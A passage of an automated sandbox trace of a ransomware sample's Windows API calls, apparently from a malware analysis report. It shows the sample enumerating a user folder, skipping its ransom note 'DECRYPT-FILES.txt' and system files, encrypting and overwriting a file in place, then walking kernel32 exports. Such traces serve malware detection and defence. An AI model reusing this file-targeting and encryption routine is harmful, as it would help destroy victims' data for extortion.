ftLastAccessTime.dwLowDateTime=0xeecf0020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecf0020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.659] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeecf0020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeecf0020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecf0020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.659] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.659] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.659] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.659] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.659] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.659] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0180.659] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.660] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0180.660] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\0a16c9.tmp" [0180.660] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.660] CloseHandle (hObject=0x0) returned 0 [0180.660] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.660] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac14f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.660] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.660] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x90b3d80, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90d9ee0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.LNK", cAlternateFileName="")) returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="DECRYPT-FILES.txt") returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="autorun.inf") returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="boot.ini") returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="desktop.ini") returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat") returned -1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="iconcache.db") returned -1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="bootsect.bak") returned 1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat.log") returned -1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="thumbs.db") returned -1 [0180.660] lstrcmpiW (lpString1="Global.LNK", lpString2="Bootfont.bin") returned 1 [0180.661] lstrlenW (lpString="Global.LNK") returned 10 [0180.661] lstrcmpiW (lpString1="LNK", lpString2="lnk") returned 0 [0180.661] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13c, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.EhK9", cAlternateFileName="INDEXD~1.EHK")) returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="DECRYPT-FILES.txt") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="autorun.inf") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="boot.ini") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="desktop.ini") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="ntuser.dat") returned -1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="iconcache.db") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="bootsect.bak") returned 1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="ntuser.dat.log") returned -1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="thumbs.db") returned -1 [0180.661] lstrcmpiW (lpString1="index.dat.EhK9", lpString2="Bootfont.bin") returned 1 [0180.661] lstrlenW (lpString="index.dat.EhK9") returned 14 [0180.661] lstrcmpiW (lpString1="EhK9", lpString2="lnk") returned -1 [0180.661] lstrcmpiW (lpString1="EhK9", lpString2="exe") returned -1 [0180.661] lstrcmpiW (lpString1="EhK9", lpString2="sys") returned -1 [0180.661] lstrcmpiW (lpString1="EhK9", lpString2="dll") returned 1 [0180.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0180.661] lstrlenW (lpString="index.dat.EhK9") returned 14 [0180.661] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0180.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="index.dat.EhK9" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9" [0180.661] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.ehk9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.662] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=316) returned 1 [0180.662] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.662] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.662] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.662] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.662] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.663] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.663] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.663] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.663] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.663] CloseHandle (hObject=0x280) returned 1 [0180.664] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.664] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.664] CloseHandle (hObject=0x0) returned 0 [0180.664] CloseHandle (hObject=0x27c) returned 1 [0180.665] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.665] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.665] GetTickCount () returned 0x11349ae [0180.665] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.665] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.665] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.665] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.666] lstrlenA (lpString="kernel32.dll") returned 12 [0180.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.666] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.666] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.666] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.666] lstrlenA (lpString="ADDATOMA") returned 8 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.666] lstrlenA (lpString="ADDATOMW") returned 8 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.666] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.666] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.666] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.666] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.666] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.666] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.666] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.666] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.667] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.667] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.667] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.667] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.667] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.667] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.667] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.667] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.667] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.667] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.667] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.667] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.667] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.667] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.667] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.667] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.667] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.667] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.667] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.667] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.667] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.668] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.668] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.668] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.668] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.668] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.668] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.668] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.668] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.668] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.668] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.668] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.668] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.668] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.668] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.668] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.668] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.668] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.668] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.668] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.668] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.669] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.669] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.669] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.669] lstrlenA (lpString="BEEP") returned 4 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.669] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.669] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.669] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.669] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.669] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.669] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.669] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.669] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.669] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.669] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.669] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.669] lstrcpyA (in: lpString1=0x36fce30, 